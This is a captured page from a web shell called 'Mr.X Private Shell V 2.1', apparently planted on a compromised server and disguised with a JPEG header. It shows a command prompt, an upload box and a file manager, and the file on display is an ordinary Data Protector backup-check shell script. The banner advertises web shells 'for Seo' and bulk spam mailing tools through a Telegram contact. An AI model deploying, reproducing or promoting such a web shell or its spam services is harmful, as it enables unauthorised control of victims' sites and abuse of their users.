����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

antiaginglove@216.73.216.231: ~ $
# 450_check_dp_client_configured.sh
# this script has a simple goal: check if this client system has been properly
# configured on the Cell Manager and backed up at least once - no more no less
# Required Data Protector User Interface only available on i386, x86_64 and ia64
# Make this work on ppc64 without the User Interface installed

OMNIDB=/opt/omni/bin/omnidb
OMNIR=/opt/omni/bin/omnir
VBDA=/opt/omni/lbin/vbda

Log "Backup method is DP: check Data Protector requirements"
test -x $VBDA || Error "Cannot execute $VBDA
Install Data Protector Disk Agent (DA component) on the client."

if [ $ARCH == "Linux-i386" ] || [ $ARCH == "Linux-ia64" ]; then
    test -x $OMNIR || Error "Cannot execute $OMNIR
    Install Data Protector User Interface (CC component) on the client."

    $OMNIDB -filesystem | grep $( hostname ) || Error "Data Protector check failed, error code $?.
    Check if the user root is configured in Data Protector UserList and backups for this client exist in the IDB.
    See $RUNTIME_LOGFILE for more details."
else
    LogPrint "Data Protector User Interface (CC component) not supported on $ARCH."
    LogPrint "Additional checks skipped. Restore can be done using Data Protector GUI only."
fi

Filemanager

Name Type Size Permission Actions
400_prep_dp.sh File 327 B 0644
450_check_dp_client_configured.sh File 1.19 KB 0644